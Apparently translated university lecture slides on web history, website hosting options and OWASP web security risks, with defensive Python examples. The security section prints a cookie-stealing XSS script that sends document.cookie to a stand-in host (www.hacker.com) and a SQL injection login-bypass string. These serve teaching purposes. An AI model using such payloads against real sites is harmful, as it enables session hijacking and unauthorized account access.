Building and Managing Enterprise Website Services

National Chi Nan University
Department of Information Management
陳彥錚
Outline
1. Introduction to WWW technology
2. Building an enterprise website
3. WWW security
1. Introduction to WWW technology
• (1945) Vannevar Bush publishes "As We May Think" (Atlantic Monthly)
– Hyperlink
• (Mar. 1989) Tim Berners-Lee, working at CERN, publishes "Information Management: A Proposal"
– A client/server model for a distributed hypertext system
CERN: European Organization for Nuclear Research
Development of WWW technology
• (1990) Tim BL writes the first Web browser:
– WorldWideWeb
• (Sep. 1993) NCSA releases the Mosaic browser.
• (Mar. 1994) Marc Andreessen & Jim Clark found Mosaic Communications Corp. (later renamed Netscape)
• (Dec. 1994) Netscape releases Netscape Navigator
– Supports HTML only
NCSA: National Center for Supercomputing Applications
HTML and HTTP
[Figure: the Browser on the Client PC sends (1) an HTTP Request to the Web Server Application on the Web Server, which returns (2) an HTTP Response carrying the HTML Document.]
• Browser
– IE (~49%)
– Firefox (~43%)
– Google Chrome (~3%)
– Safari, Opera, …
• Web Server
– Apache (~50%)
– Microsoft IIS (~35%)
– Google GWS (~6%)
– …
http://en.wikipedia.org/wiki/Usage_share_of_web_browsers
http://www.w3schools.com/browsers/browsers_stats.asp
Downloading a Web Page with Two Graphics Files
[Figure, shown over three slides: the Browser on the Client PC requests the HTML Document from the Web Server Application (1), then the 2 Graphics Files (2, 3); the three files are rendered "As Displayed" as a single page.]
Webpage Consists of Three Files, Rendered as a Single Page On-Screen
Download Requires 3 HTTP Request-Response Cycles; Downloads HTML Page First; It has Tags to Identify Other Files
http://web2.im.ncnu.edu.tw/ycchen/www/wwwm.html
Development of WWW technology: JavaScript
• (Dec. 1995) Netscape Navigator 2.0 supports JavaScript
– A programming language interpreted and executed inside the browser
<script>
// Draw ten horizontal rules of increasing thickness and width
for (var i = 0; i < 10; i++) {
document.write("<hr size=" + 2*i + " width=" + 40*i + " color='red'>");
}
alert("Welcome to JavaScript Test!\nSee you!");
</script>
Advantages of Using JavaScript
• Validate user's input.
• Perform aggregate calculations.
• Easily prompt a user for confirmation, alert, pop-up
information.
• Control of Web browser's behaviors and HTML page
component's properties.
• Conditionalize HTML.
• Perform operations independent of server information.
• Control of Dynamic HTML.
http://web2.im.ncnu.edu.tw/ycchen/www/js/byExample.html
http://web2.im.ncnu.edu.tw/ycchen/www2000/npm.html
Java
• (Jan. 1996) Sun releases the Java programming language
– Java applications are compiled to Bytecode and run in any environment that supports the JVM (Java Virtual Machine)
• Java Applet
– A small Java program that runs inside the Web browser
<HTML>
<title>歡迎使用校務自動化系統</title>
<applet codebase="." code="NCNUTeacherApplet" archive="www.jar" width=800 height=450>
</applet>
</HTML>
Cascading Style Sheets (CSS)
• A stylesheet language
• Lets a web page define its styles, so that the page layout is displayed in a more precise and structured way
<style>
a {text-decoration:none;}
td {background-color:Ivory;}
ul {list-style-image:url(gball.gif);}
h2 {color:white; background-color:black; font-size:1in}
…
</style>
http://www.w3schools.com/css/default.asp
• Dynamic HTML: JavaScript + CSS
http://stdata.im.ncnu.edu.tw/
Other browser-side Web technologies
• Browser plug-ins (add-on components)
– Flash (http://web2.im.ncnu.edu.tw/ycchen/doc1/)
– PDF, Windows Media Player, QuickTime, …
• XML (Extensible Markup Language)
<?xml version="1.0" encoding="UTF-8"?>
<department>
<member>
<id type="StuCard">s96211341</id>
<name>Chia-Chia Liu</name>
<email>[email protected]</email>
</member>
</department>
• AJAX: Asynchronous JavaScript and XML
http://www.zdnet.com.tw/news/software/0,2000085678,20145297,00.htm
http://chinese.engadget.com/2010/05/10/opera-hakon-wium-lie-and-von-tetzchner-talk-web/
Points to note in web page design
• Balance artwork and content
• Avoid horizontal scroll bars
• Choose colours from the 216 web-safe colours
• Allow for differences between browsers (JavaScript, ActiveX, CSS, …)
• Correctness of hyperlinks
– file:///C:/www/radio.html
– http://192.168.0.1/xx.html
Server-side Web technologies
• Common Gateway Interface (CGI)
– The interface between the Web Server and server-side application programs
• Server-side Web programming languages
– ASP, JSP, Perl, Php
• Database
– MS SQL Server, MySQL, mSQL, Oracle
Web Content Management System (CMS)
• Joomla!
– http://www.joomla123.com.tw/
– http://www.classicalvinylrepublic.tw/
• WordPress
• Drupal
• Xoops
2. Building an enterprise website
• Web page (program) design
– Static pages, Flash multimedia, dynamic web programs
– E-commerce
• Membership
• Payment mechanisms: credit card, ATM transfer, cash on delivery
• Website hosting
– Self-hosting
– Virtual Hosting
– Co-Location
Self-hosting a website
• Hardware:
– Rack-mounted server, RAID disks?, uninterruptible power supply
• Software:
– Operating system, Web server program, database
– XAMPP
• Network:
– IP address, host domain name
– External bandwidth
– Network security and firewall
Virtual Hosting
• The ISP rents out the hardware, software and network services needed to host a website.
– Dedicated domain name and network address
– Disk space
– Network bandwidth
– Server-side Web programming language support
– Database
– Back-end administration
Co-Location
• The ISP provides the machine room and network; enterprise customers place their own hosts and network equipment there.
• IDC (Internet Data Center) services
– Machine room space
– Network bandwidth
– IP addresses provided
– Network management: traffic monitoring, fault management
– Network security: DDoS attacks, virus scanning
3. WWW security
Web security is important for E-Commerce.
Previous studies:
– SSL
– SET
– Web server security
Application-level security
– Web applications mistakenly trust data returned
from a client.
OWASP
• Open Web Application Security Project (OWASP)
• http://www.owasp.org/index.php/Taiwan
OWASP Top 10 Web Security Vulnerabilities (2007)
A1. Cross Site Scripting (XSS)
A2. Injection Flaws: SQL Injection and Command Injection
A3. Malicious File Execution
A4. Insecure Direct Object Reference
A5. Cross-Site Request Forgery (CSRF)
A6. Information Leakage and Improper Error Handling
A7. Broken Authentication and Session Management
A8. Insecure Cryptographic Storage
A9. Insecure Communication
A10. Failure to Restrict URL Access
Source: OWASP Taiwan Chapter
OWASP: Open Web Application Security Project
The Ten Most Critical Web Application Security Vulnerabilities
1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-Site Scripting (XSS)
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration
(1). Unvalidated Parameters
• Information from web requests is not validated
before being used by a web application.
• Attackers can use these flaws to attack
background components through a web
application.
(2). Broken Access Control
• Restrictions on what authenticated users are
allowed to do are not properly enforced.
• Attackers can exploit these flaws to access
other users' accounts, view sensitive files, or
use unauthorized functions.
http://www.citibank.com/print.asp?id=u1257
(3). Broken Account and Session Management
• Account credentials and session tokens are not
properly protected.
• Attackers that can compromise passwords, keys,
session cookies, or other tokens can defeat
authentication restrictions and assume other
users' identities.
(4). Cross-Site Scripting (XSS)
• The web application can be used as a
mechanism to transport an attack to an end
user's browser.
• A successful attack can disclose the end user's
session token, attack the local machine, or
spoof content to fool the user.
XSS Example
~Guestbook~
<script>
window.location="http://www.hacker.com/steal.cgi?ck="+document.cookie;
</script>
[Figure: XSS Web Application Hijack Scenario (www.hacker.com)]
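As an added defensive counterpart to the guestbook example above (example code, not from the original slides): a guestbook that pastes stored entries straight into the page lets the browser run the script for every later visitor, whereas output encoding with the Python standard library's html.escape turns the same entry into visible text. The stored entry is the slide's script; the function names are assumptions made for this illustration.

```python
import html

# The slide's guestbook payload, embedded here as the constructed sample entry.
SAMPLE_ENTRY = ('<script>window.location="http://www.hacker.com/steal.cgi?ck="'
                '+document.cookie;</script>')


def render_entry_unsafe(entry):
    """What a naive guestbook does: the stored text is inserted into the page
    unchanged, so the <script> tag is executed by every visitor's browser."""
    return "<p>" + entry + "</p>"


def render_entry(entry):
    """Output encoding: every character with meaning in HTML (<, >, &, quotes)
    becomes an entity, so the entry is displayed, never executed."""
    return "<p>" + html.escape(entry, quote=True) + "</p>"


def has_active_content(markup):
    """Crude check used only to compare the two renderings: is there still a
    real <script> tag in the markup the browser would receive?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_entry_unsafe(SAMPLE_ENTRY))
    print("encoded:", render_entry(SAMPLE_ENTRY))
```

Encoding on output is the fix that belongs to the application; marking the session cookie HttpOnly is a second, independent layer, because document.cookie then cannot read it even if some script does get through.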
(5). Buffer Overflows
• Web application components in some
languages that do not properly validate input
can be crashed and, in some cases, used to take
control of a process.
• These components can include CGI, libraries,
drivers, and web application server
components.
(6). Command Injection Flaws
• Web applications pass parameters when they access
external systems or the local operating system.
• If an attacker can embed malicious commands in
these parameters, the external system may execute
those commands on behalf of the web application.
SQL Injection
SQLQuery =
"SELECT * FROM Users WHERE (UserName='" + strUN + "') AND (Password='" + strPW + "');"
• User name "fredchen", password "199msq":
SELECT * FROM Users WHERE (UserName='fredchen') AND (Password='199msq');
• SQL Injection: User name/Password : ' OR 'A'='A
SELECT * FROM Users WHERE (UserName='' OR 'A'='A') AND (Password='' OR 'A'='A');
Input Validation
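To make the Input Validation point concrete, here is an added Python example (not code from the original slides) that builds the slide's login query both by string concatenation and as a parameterized query against a constructed in-memory SQLite table, and adds an allowlist check on the user name. The table contents, the function names and the allowlist pattern are assumptions for this illustration.

```python
import re
import sqlite3

# Constructed sample data: one user, stored exactly as the slide shows it.
# (A real system stores a password hash, not the password; see the later
# slide on Insecure Use of Cryptography.)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
conn.execute("INSERT INTO Users VALUES ('fredchen', '199msq')")
conn.commit()


def build_query_concat(strUN, strPW):
    """The slide's query, built by concatenating raw input into SQL text."""
    return ("SELECT * FROM Users WHERE (UserName='" + strUN + "') "
            "AND (Password='" + strPW + "');")


def login_concat(strUN, strPW):
    """Vulnerable: whatever the user types becomes part of the SQL statement,
    so a quote in the input changes the structure of the WHERE clause."""
    row = conn.execute(build_query_concat(strUN, strPW)).fetchone()
    return row is not None


def login_param(strUN, strPW):
    """Hardened: placeholders hand the input to the driver as data, so quotes
    inside it are compared literally and never alter the statement."""
    sql = "SELECT * FROM Users WHERE (UserName=?) AND (Password=?)"
    row = conn.execute(sql, (strUN, strPW)).fetchone()
    return row is not None


# Assumed account-name policy: letters, digits and underscore only.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def valid_username(strUN):
    """Allowlist check: reject input that is not a plain account name before
    it reaches the database (defence in depth alongside parameterization)."""
    return USERNAME_RE.fullmatch(strUN) is not None


if __name__ == "__main__":
    payload = "' OR 'A'='A"
    print(build_query_concat(payload, payload))
    print("concatenated query, injected input:", login_concat(payload, payload))
    print("parameterized query, injected input:", login_param(payload, payload))
    print("allowlist accepts injected input:", valid_username(payload))
```

With the concatenated query the slide's input logs in without knowing any password; with the parameterized query the same input is simply a user name that does not exist. The allowlist is a separate, earlier check and does not replace the parameterized query, since the password field cannot be restricted the same way.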
(7). Error Handling Problems
• Error conditions that occur during normal
operation are not handled properly.
• If an attacker can cause errors to occur that the
web application does not handle, they can gain
detailed system information, deny service,
cause security mechanisms to fail, or crash the
server.
(8). Insecure Use of Cryptography
• Web applications frequently use cryptographic
functions to protect information and credentials.
• These functions and the code to integrate them have
proven difficult to code properly, frequently resulting
in weak protection.
• E.g. MD5(CreditCardNum, RandomNum)
(9). Remote Administration Flaws
• Many web applications allow administrators to access
the site using a web interface.
• If these administrative functions are not very carefully
protected, an attacker can gain full access to all
aspects of a site.
(10). Web and Application Server Misconfiguration
• Having a strong server configuration standard
is critical to a secure web application.
• These servers have many configuration options
that affect security and are not secure out of the
box.